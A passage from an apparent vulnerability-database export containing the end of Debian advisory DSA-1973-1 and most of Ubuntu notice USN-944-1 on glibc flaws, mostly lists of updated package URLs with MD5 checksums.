http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.7-18lenny2_sparc.udeb\n Size/MD5 checksum: 15038 60c07ae011350357a6162218a3d70738\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.7-18lenny2_sparc.deb\n Size/MD5 checksum: 6799358 14d7440321a1c8cd941618fa82ef0d53\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev-sparc64_2.7-18lenny2_sparc.deb\n Size/MD5 checksum: 2589060 0b0215c95cf737680551eedaecb3cb06\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 9, "modified": "2010-01-19T22:33:02", "published": "2010-01-19T22:33:02", "id": "DEBIAN:DSA-1973-1:9EEF7", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2010/msg00008.html", "title": "[SECURITY] [DSA 1973-1] New glibc packages fix information disclosure", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:34", "bulletinFamily": "software", "cvelist": ["CVE-2010-0296", "CVE-2010-0830", "CVE-2008-1391"], "description": "===========================================================\r\nUbuntu Security Notice USN-944-1 May 25, 2010\r\nglibc, eglibc vulnerabilities\r\nCVE-2008-1391, CVE-2010-0296, CVE-2010-0830\r\n===========================================================\r\n\r\nA security issue affects the following Ubuntu releases:\r\n\r\nUbuntu 6.06 LTS\r\nUbuntu 8.04 LTS\r\nUbuntu 9.04\r\nUbuntu 9.10\r\nUbuntu 10.04 LTS\r\n\r\nThis advisory also applies to the corresponding versions of\r\nKubuntu, Edubuntu, and Xubuntu.\r\n\r\nThe problem can be corrected by upgrading your system to the\r\nfollowing package versions:\r\n\r\nUbuntu 6.06 LTS:\r\n libc6 2.3.6-0ubuntu20.6\r\n\r\nUbuntu 8.04 LTS:\r\n libc6 2.7-10ubuntu6\r\n\r\nUbuntu 9.04:\r\n libc6 2.9-4ubuntu6.2\r\n\r\nUbuntu 9.10:\r\n libc6 2.10.1-0ubuntu17\r\n\r\nUbuntu 10.04 LTS:\r\n libc6 2.11.1-0ubuntu7.1\r\n\r\nAfter a standard system update you need to restart all services to make\r\nthe necessary changes.\r\n\r\nDetails follow:\r\n\r\nMaksymilian Arciemowicz discovered that the GNU C library did not\r\ncorrectly handle integer overflows in the strfmon function. If a user\r\nor automated system were tricked into processing a specially crafted\r\nformat string, a remote attacker could crash applications, leading to\r\na denial of service. (Ubuntu 10.04 was not affected.) (CVE-2008-1391)\r\n\r\nJeff Layton and Dan Rosenberg discovered that the GNU C library did not\r\ncorrectly handle newlines in the mntent family of functions. If a local\r\nattacker were able to inject newlines into a mount entry through other\r\nvulnerable mount helpers, they could disrupt the system or possibly gain\r\nroot privileges. (CVE-2010-0296)\r\n\r\nDan Rosenberg discovered that the GNU C library did not correctly validate\r\ncertain ELF program headers. If a user or automated system were tricked\r\ninto verifying a specially crafted ELF program, a remote attacker could\r\nexecute arbitrary code with user privileges. (CVE-2010-0830)\r\n\r\n\r\nUpdated packages for Ubuntu 6.06 LTS:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/glibc_2.3.6-0ubuntu20.6.diff.gz\r\n Size/MD5: 572994 a6a01bf279888c3d2b14dee810d96630\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/glibc_2.3.6-0ubuntu20.6.dsc\r\n Size/MD5: 1979 fe2822fd0469e46f34783b1f9c7e5380\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/glibc_2.3.6.orig.tar.gz\r\n Size/MD5: 13891563 c50d207d67b330a4515321cbac3776f8\r\n\r\n Architecture independent packages:\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/glibc-doc_2.3.6-0ubuntu20.6_all.deb\r\n Size/MD5: 3355172 e815a0572d0679a20eb1820977993dc8\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/universe/g/glibc/zoneinfo-udeb_2.3.6-0ubuntu20.6_all.udeb\r\n Size/MD5: 11142 1e3d6fdf2926492042d626bc1c9f2680\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dbg_2.3.6-0ubuntu20.6_amd64.deb\r\n Size/MD5: 4142176 d5b4976d3ad3487a4309d849d66b1d12\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dev-i386_2.3.6-0ubuntu20.6_amd64.deb\r\n Size/MD5: 1350178 f1b7c0fbc5759fce5479e371c0f0d117\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dev_2.3.6-0ubuntu20.6_amd64.deb\r\n Size/MD5: 2330458 18c07b45b8557f23884b705258aaf074\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-i386_2.3.6-0ubuntu20.6_amd64.deb\r\n Size/MD5: 2986676 d57f2ecb7c2177fba0872d600989106d\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-pic_2.3.6-0ubuntu20.6_amd64.deb\r\n Size/MD5: 1439258 e699685adee781617370a613d6ffa261\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-prof_2.3.6-0ubuntu20.6_amd64.deb\r\n Size/MD5: 1801612 6171beff64ba97745a06bee9f0f67af0\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-udeb_2.3.6-0ubuntu20.6_amd64.udeb\r\n Size/MD5: 1071392 0fdca0be317f91aa4eb87d0a2a110dc6\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6_2.3.6-0ubuntu20.6_amd64.deb\r\n Size/MD5: 4042158 79690404d23e644925c75e28b6435aea\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libnss-dns-udeb_2.3.6-0ubuntu20.6_amd64.udeb\r\n Size/MD5: 9358 326e018f2da880ab06ccbb3aa9c32412\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libnss-files-udeb_2.3.6-0ubuntu20.6_amd64.udeb\r\n Size/MD5: 18050 dd94fc601d5fb3099abc708becfc8dc4\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/universe/g/glibc/nscd_2.3.6-0ubuntu20.6_amd64.deb\r\n Size/MD5: 140614 da3335d53109c36085713f2c676a4d1e\r\n\r\n i386 architecture (x86 compatible Intel/AMD):\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-amd64_2.3.6-0ubuntu20.6_i386.deb\r\n Size/MD5: 3324750 f031c74dd7985269385da48c7bdbc296\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dbg_2.3.6-0ubuntu20.6_i386.deb\r\n Size/MD5: 5555456 18098a4504477e54f8d9ddfe5703f729\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dev-amd64_2.3.6-0ubuntu20.6_i386.deb\r\n Size/MD5: 2233746 9c3b54aa0c9a1caa8baa8832b4153d3f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dev_2.3.6-0ubuntu20.6_i386.deb\r\n Size/MD5: 2823036 8dcd9700f5c569ea50c1a77c6af58fa7\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-i686_2.3.6-0ubuntu20.6_i386.deb\r\n Size/MD5: 1080736 01e3021d68581ad0c2bc1ea39ede96b9\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-pic_2.3.6-0ubuntu20.6_i386.deb\r\n Size/MD5: 1037776 c479d144f5d56ab4166e51d260fe1ff3\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-prof_2.3.6-0ubuntu20.6_i386.deb\r\n Size/MD5: 1247448 560c254211bd57a1303c1d481b9e6071\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-udeb_2.3.6-0ubuntu20.6_i386.udeb\r\n Size/MD5: 699814 acea8cb6dca3988e1f13f6af1982d413\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6_2.3.6-0ubuntu20.6_i386.deb\r\n Size/MD5: 4615460 b8ae65bc40c4df6d72d1e35e5b28f00c\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libnss-dns-udeb_2.3.6-0ubuntu20.6_i386.udeb\r\n Size/MD5: 8294 7393a517b72081d640d97e591228e481\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libnss-files-udeb_2.3.6-0ubuntu20.6_i386.udeb\r\n Size/MD5: 13624 696b60f05d2b0484eb672ac55870a4d6\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/universe/g/glibc/nscd_2.3.6-0ubuntu20.6_i386.deb\r\n Size/MD5: 134660 967249254ea2b9d81338b102a3e5fa79\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5):\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dbg_2.3.6-0ubuntu20.6_powerpc.deb\r\n Size/MD5: 4653438 74bba116d0e021b4f7a81e97d7d2f637\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dev-ppc64_2.3.6-0ubuntu20.6_powerpc.deb\r\n Size/MD5: 2001302 e59a2ca368ee8e8bf0e9168979594f49\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dev_2.3.6-0ubuntu20.6_powerpc.deb\r\n Size/MD5: 2462616 f62d342d7fa729fc22758d273a6ec427\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-pic_2.3.6-0ubuntu20.6_powerpc.deb\r\n Size/MD5: 1477412 ad87cc42b58b24694161661d9ad406c2\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-ppc64_2.3.6-0ubuntu20.6_powerpc.deb\r\n Size/MD5: 3644848 c41ac746c3114bda650d55a9cc6ddb3e\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-prof_2.3.6-0ubuntu20.6_powerpc.deb\r\n Size/MD5: 1972892 f869bfdebfae71f8a72939cc5e6f7d1b\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-udeb_2.3.6-0ubuntu20.6_powerpc.udeb\r\n Size/MD5: 1149854 514d0755a1d22ccc0f317bf3bc90821d\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6_2.3.6-0ubuntu20.6_powerpc.deb\r\n Size/MD5: 4224754 db662479f0c73f1c0da94d53bc59b757\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libnss-dns-udeb_2.3.6-0ubuntu20.6_powerpc.udeb\r\n Size/MD5: 9594 801ee50757d501d167225990206b4ce0\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libnss-files-udeb_2.3.6-0ubuntu20.6_powerpc.udeb\r\n Size/MD5: 17688 3469b3463af366224bf854a24542720b\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/universe/g/glibc/nscd_2.3.6-0ubuntu20.6_powerpc.deb\r\n Size/MD5: 141098 1d0a8d536df9d6b67fc468f3eba960e8\r\n\r\n sparc architecture (Sun SPARC/UltraSPARC):\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dbg_2.3.6-0ubuntu20.6_sparc.deb\r\n Size/MD5: 6016206 2ce0f2e9f0dbe23cd16cc822c4a1de5d\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dev-sparc64_2.3.6-0ubuntu20.6_sparc.deb\r\n Size/MD5: 2083496 6c89777c78d52fab12427a251908953e\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dev_2.3.6-0ubuntu20.6_sparc.deb\r\n Size/MD5: 2544296 8e320f08eddfbf66b66111ade98975c5\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-pic_2.3.6-0ubuntu20.6_sparc.deb\r\n Size/MD5: 1500412 3aa5cbc607e69cd5efad8c40ef2dd5a3\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-prof_2.3.6-0ubuntu20.6_sparc.deb\r\n Size/MD5: 2053354 ddd2a0a13c9a21789ddc85ce26534312\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-sparc64_2.3.6-0ubuntu20.6_sparc.deb\r\n Size/MD5: 3763798 b46598a3e52b652f4aff902d51400eef\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-sparc64b_2.3.6-0ubuntu20.6_sparc.deb\r\n Size/MD5: 1671018 9486205dab6d42a2afaa62e84143062f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-sparc64v_2.3.6-0ubuntu20.6_sparc.deb\r\n Size/MD5: 1669902 0fa0c2fb1b2073e0afb6610df29bb01e\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-sparcv9b_2.3.6-0ubuntu20.6_sparc.deb\r\n Size/MD5: 1479834 cb59c59fc226efe1a02cc03ee9efe97f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-sparcv9v_2.3.6-0ubuntu20.6_sparc.deb\r\n Size/MD5: 1479172 9d88114f503f130c967a900a9f994435\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-udeb_2.3.6-0ubuntu20.6_sparc.udeb\r\n Size/MD5: 1161362 eef456642d706c5315d4bfab4393cfc2\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6_2.3.6-0ubuntu20.6_sparc.deb\r\n Size/MD5: 4261770 f07336505aa3309459194afa4259242f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libnss-dns-udeb_2.3.6-0ubuntu20.6_sparc.udeb\r\n Size/MD5: 8784 360236353a478e759f7de1f639b28fc8\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libnss-files-udeb_2.3.6-0ubuntu20.6_sparc.udeb\r\n Size/MD5: 17268 41cb00e402281b4228ea7a6b477fe42b\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/universe/g/glibc/nscd_2.3.6-0ubuntu20.6_sparc.deb\r\n Size/MD5: 139302 28d2f4a7e7b3d7815eb6d6c0a03b65b3\r\n\r\nUpdated packages for Ubuntu 8.04 LTS:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/glibc_2.7-10ubuntu6.diff.gz\r\n Size/MD5: 802582 b904d2f296da818e9688dd86ebc7fee0\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/glibc_2.7-10ubuntu6.dsc\r\n Size/MD5: 2373 e57824cfa0ac5ba996776e79155375b6\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/glibc_2.7.orig.tar.gz\r\n Size/MD5: 15983612 eda64bfa0bcad46fe7d7d7fecfc23bfd\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/glibc-doc_2.7-10ubuntu6_all.deb\r\n Size/MD5: 3474180 572645067b9f2c33015b901651b48d36\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/universe/g/glibc/glibc-source_2.7-10ubuntu6_all.deb\r\n Size/MD5: 16585274 2c4c973637518e71a12a376adf633f2b\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dbg_2.7-10ubuntu6_amd64.deb\r\n Size/MD5: 5324104 339264adf704854cfcdc747e6510ab9b\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dev-i386_2.7-10ubuntu6_amd64.deb\r\n Size/MD5: 1493830 3789a892ae550062a0c30809ea7a9b5d\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dev_2.7-10ubuntu6_amd64.deb\r\n Size/MD5: 2539086 ba79ffb8460f030485b1650b13316c5d\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-i386_2.7-10ubuntu6_amd64.deb\r\n Size/MD5: 3699098 d5a6d4e2ffc66194681737a4f968b508\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-pic_2.7-10ubuntu6_amd64.deb\r\n Size/MD5: 1495844 aa2f6bd76a6697335e3a632f2275b943\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-prof_2.7-10ubuntu6_amd64.deb\r\n Size/MD5: 1973968 ab76a6436028f38fdf74fe700d079ed9\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-udeb_2.7-10ubuntu6_amd64.udeb\r\n Size/MD5: 1131978 8ca90c0840a7742cd5d3bbb1be82f7c9\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6_2.7-10ubuntu6_amd64.deb\r\n Size/MD5: 4754846 c79a693bbb5100c481d097743469080a\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libnss-dns-udeb_2.7-10ubuntu6_amd64.udeb\r\n Size/MD5: 9850 8ce29f5906bfa4df24c523173833a901\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libnss-files-udeb_2.7-10ubuntu6_amd64.udeb\r\n Size/MD5: 18158 95fb70f81adda39b816f099d4c6c3b8d\r\n http://security.ubuntu.com/ubuntu/pool/universe/g/glibc/nscd_2.7-10ubuntu6_amd64.deb\r\n Size/MD5: 181988 e64d46eda77fde9a55cd06c777a720d2\r\n\r\n i386 architecture (x86 compatible Intel/AMD):\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-amd64_2.7-10ubuntu6_i386.deb\r\n Size/MD5: 3983144 8aa7bc4e2eefc0cf9b373ffe8e57dbd3\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dbg_2.7-10ubuntu6_i386.deb\r\n Size/MD5: 5095364 83224db163d914c6904aec74817d1a37\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dev-amd64_2.7-10ubuntu6_i386.deb\r\n Size/MD5: 1974410 cccce8adb942d1ba2ae6295e946218fe\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dev_2.7-10ubuntu6_i386.deb\r\n Size/MD5: 3345852 74eb869500ae9baacdbb77bf13d9662b\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-i686_2.7-10ubuntu6_i386.deb\r\n Size/MD5: 1243798 d0734e24eb5a2b6b0ec986a7129f8692\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-pic_2.7-10ubuntu6_i386.deb\r\n Size/MD5: 1150536 8f6ad0dceb5e8787012f1da5a859f22a\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-prof_2.7-10ubuntu6_i386.deb\r\n Size/MD5: 1430674 bf4218d49fda33baa777ec8f005bbc25\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-udeb_2.7-10ubuntu6_i386.udeb\r\n Size/MD5: 809822 12e64fe8d5b4f1c1cb1a0309284720a0\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6_2.7-10ubuntu6_i386.deb\r\n Size/MD5: 4307628 4dac8c744346e956f19dbb2d83ad6747\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libnss-dns-udeb_2.7-10ubuntu6_i386.udeb\r\n Size/MD5: 8860 749f705adc0edc7dd94fcdc9e2d17080\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libnss-files-udeb_2.7-10ubuntu6_i386.udeb\r\n Size/MD5: 14976 3fdca91ee276dca136b6549bc9ddf6b9\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/universe/g/glibc/libc6-xen_2.7-10ubuntu6_i386.deb\r\n Size/MD5: 1247774 28811dfb780af1484c5af206767101d1\r\n http://security.ubuntu.com/ubuntu/pool/universe/g/glibc/nscd_2.7-10ubuntu6_i386.deb\r\n Size/MD5: 176232 97197c4bc3b2a72122b74f71c59b1b1a\r\n\r\n lpia architecture (Low Power Intel Architecture):\r\n\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-dbg_2.7-10ubuntu6_lpia.deb\r\n Size/MD5: 4691818 c5ae64d2705528a43a3ef66ed8484c6d\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-dev_2.7-10ubuntu6_lpia.deb\r\n Size/MD5: 2067172 1c35f6efd884a92fc5248e47f316d7ed\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-pic_2.7-10ubuntu6_lpia.deb\r\n Size/MD5: 1170192 d24dd2511d64e15fd7f0014b996cee28\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-prof_2.7-10ubuntu6_lpia.deb\r\n Size/MD5: 1516216 9b670b612cf86b0857b6dc19e835b2cc\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-udeb_2.7-10ubuntu6_lpia.udeb\r\n Size/MD5: 860876 901ed6e39312b5e86a54c5e504e4a5fb\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6_2.7-10ubuntu6_lpia.deb\r\n Size/MD5: 4377896 93c994a7a9eba3dba9fca8c902708674\r\n http://ports.ubuntu.com/pool/main/g/glibc/libnss-dns-udeb_2.7-10ubuntu6_lpia.udeb\r\n Size/MD5: 9272 2f1cacf543b437dfd656ddb07ad9f0c2\r\n http://ports.ubuntu.com/pool/main/g/glibc/libnss-files-udeb_2.7-10ubuntu6_lpia.udeb\r\n Size/MD5: 15280 c08122e6249a3ed38d9d42b98ab4337f\r\n http://ports.ubuntu.com/pool/universe/g/glibc/nscd_2.7-10ubuntu6_lpia.deb\r\n Size/MD5: 178520 0dd2ac7b30225b603518bbcf52e2dadb\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5):\r\n\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-dbg_2.7-10ubuntu6_powerpc.deb\r\n Size/MD5: 6150670 971d453bbf4516f241e3485c9ef0a4eb\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-dev-ppc64_2.7-10ubuntu6_powerpc.deb\r\n Size/MD5: 2362578 7c21d9ebb3c40923a3d4a521f5c3d1c3\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-dev_2.7-10ubuntu6_powerpc.deb\r\n Size/MD5: 2772448 942d44f981d098034d8743a8613b5297\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-pic_2.7-10ubuntu6_powerpc.deb\r\n Size/MD5: 1571514 e3d194ad487d69818c2e54769906f2e7\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-ppc64_2.7-10ubuntu6_powerpc.deb\r\n Size/MD5: 4339676 f245d80f10dd66a8bfc4d16a74f1effc\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-prof_2.7-10ubuntu6_powerpc.deb\r\n Size/MD5: 2234400 87013a5605df086936411a07227b6330\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-udeb_2.7-10ubuntu6_powerpc.udeb\r\n Size/MD5: 1204076 eb7fb756458750c655daad4960489b72\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6_2.7-10ubuntu6_powerpc.deb\r\n Size/MD5: 4896198 5ec47bc28796c8973d3cfff9b2a9682c\r\n http://ports.ubuntu.com/pool/main/g/glibc/libnss-dns-udeb_2.7-10ubuntu6_powerpc.udeb\r\n Size/MD5: 9490 187fc4632ba68846a4902a3124cc96f5\r\n \r\nhttp://ports.ubuntu.com/pool/main/g/glibc/libnss-files-udeb_2.7-10ubuntu6_powerpc.udeb\r\n Size/MD5: 16358 1f9a425375a92864039742be33c4f99e\r\n http://ports.ubuntu.com/pool/universe/g/glibc/nscd_2.7-10ubuntu6_powerpc.deb\r\n Size/MD5: 178982 199923532e05190ab199cfc2117c46ee\r\n\r\nUpdated packages for Ubuntu 9.04:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/glibc_2.9-4ubuntu6.2.diff.gz\r\n Size/MD5: 2682431 bbdb7b9b03bf2317af25b34e227a15f9\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/glibc_2.9-4ubuntu6.2.dsc\r\n Size/MD5: 3067 3f5e8da051f27a1b73073eeb27e0fcaa\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/glibc_2.9.orig.tar.gz\r\n Size/MD5: 23036779 926e90e50fe4f830575fef1c6a554768\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/glibc-doc_2.9-4ubuntu6.2_all.deb\r\n Size/MD5: 3503532 819296b8d72e57781c4bdce1c8d73097\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/universe/g/glibc/glibc-source_2.9-4ubuntu6.2_all.deb\r\n Size/MD5: 12417284 886bb2af0197e85e66888c9c2f233c68\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dbg_2.9-4ubuntu6.2_amd64.deb\r\n Size/MD5: 10452676 a0004c106622bab7a8902658ddcc18b4\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dev-i386_2.9-4ubuntu6.2_amd64.deb\r\n Size/MD5: 1553172 7059151f75384b16f7616e528acd099b\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dev_2.9-4ubuntu6.2_amd64.deb\r\n Size/MD5: 2612710 baeb6c26bf2528e7b56f42c3d4a01da3\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-i386_2.9-4ubuntu6.2_amd64.deb\r\n Size/MD5: 3706766 024fcdc84ddefc6048037b5339ee2cae\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-pic_2.9-4ubuntu6.2_amd64.deb\r\n Size/MD5: 1555548 504dbd36f4ab7889b77b9dd8c5ed581f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-prof_2.9-4ubuntu6.2_amd64.deb\r\n Size/MD5: 2045820 3c78a729fdaacce5c7782ea345326580\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-udeb_2.9-4ubuntu6.2_amd64.udeb\r\n Size/MD5: 1182542 21a4d1ba04b6a134a76e0d31e60fee4b\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6_2.9-4ubuntu6.2_amd64.deb\r\n Size/MD5: 4952548 11f6d0c36f439c4b35097955287f01ef\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libnss-dns-udeb_2.9-4ubuntu6.2_amd64.udeb\r\n Size/MD5: 11384 286305a2edcc2326108104592852544a\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libnss-files-udeb_2.9-4ubuntu6.2_amd64.udeb\r\n Size/MD5: 20198 852b1243b5d4c00557b3e18749b54970\r\n http://security.ubuntu.com/ubuntu/pool/universe/g/glibc/nscd_2.9-4ubuntu6.2_amd64.deb\r\n Size/MD5: 200466 08297c5ab935c702489f99d2e36c0e31\r\n\r\n i386 architecture (x86 compatible Intel/AMD):\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-amd64_2.9-4ubuntu6.2_i386.deb\r\n Size/MD5: 4047050 4d53539b79bdfcc1e9eed979b3101588\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dbg_2.9-4ubuntu6.2_i386.deb\r\n Size/MD5: 16784900 1213e91c228406ab86095970d1790405\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dev-amd64_2.9-4ubuntu6.2_i386.deb\r\n Size/MD5: 2045540 00f9dcac4d49a1299f3a39a59bb38721\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dev_2.9-4ubuntu6.2_i386.deb\r\n Size/MD5: 3454044 1b3ed11fd40fa3b94cf2a1be985ea116\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-i686_2.9-4ubuntu6.2_i386.deb\r\n Size/MD5: 1245916 fd8cc2543869ce702ce02fa112e2c57d\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-pic_2.9-4ubuntu6.2_i386.deb\r\n Size/MD5: 1194494 07740cc4b48015efb4cfb4a8325a8e03\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-prof_2.9-4ubuntu6.2_i386.deb\r\n Size/MD5: 1484748 c3b52e87d7c4d34acab64374bda33d8d\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-udeb_2.9-4ubuntu6.2_i386.udeb\r\n Size/MD5: 844806 5aeb307bf38a12d12c8c34bbe6814ef8\r\n http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6_2.9-4ubuntu6.2_i386.deb\r\n Size/MD5: 4471982 